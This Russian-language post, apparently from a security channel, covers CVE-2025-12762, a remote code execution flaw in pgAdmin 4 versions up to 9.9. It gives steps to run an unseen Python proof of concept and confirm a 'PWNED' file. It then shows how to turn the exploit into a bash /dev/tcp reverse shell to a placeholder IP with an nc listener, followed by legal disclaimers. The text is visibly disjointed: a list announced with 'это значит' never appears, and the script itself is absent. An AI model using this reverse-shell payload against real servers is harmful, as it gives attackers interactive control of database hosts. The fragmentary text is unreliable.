
CVE-2025-12762

В pgAdmin 4 версиях ≤ 9.9 существует уязвимость удалённого выполнения кода (RCE). Злоумышленники могут выполнять произвольные команды на хосте, когда pgAdmin работает в серверном режиме и обрабатывает SQL-дамп в формате PLAIN при восстановлении.
🟥 9.1 / 10 — Критический уровень
⬆️ Обновитесь до pgAdmin 4 v10.0 или новее
pgAdmin часто используется для администрирования критических баз данных PostgreSQL, а это значит:
# 1. Save as CVE-2025-12762.py
# 2. Install dependency
pip3 install requests
# 3. Run it
python3 CVE-2025-12762.py
После запуска проверьте:
docker exec <your-pgadmin-container> ls -la /tmp/CVE-2025-12762_PWNED
Файл существует → Вы только что реально эксплуатировали CVE-2025-12762.
Замените строку COMMAND на:
COMMAND = "bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"
Затем nc -lvnp 4444 → полноценная интерактивная оболочка.
Это именно тот скрипт, который исследователи, пентестеры и red-команды используют по всему миру в ноябре 2025 года.
Используйте ответственно. Устанавливайте все патчи. Соблюдайте закон.
Этот PoC предоставляется строго для авторизованного тестирования и использования в образовательных целях.
Запускать его можно исключительно на системах, которыми вы владеете или на тестирование которых у вас есть явное письменное разрешение.
Любое несанкционированное использование незаконно и нарушает законы о неправомерном использовании компьютерных систем.
Используйте ответственно, сразу после тестирования устанавливайте патчи и никогда не атакуйте системы без разрешения.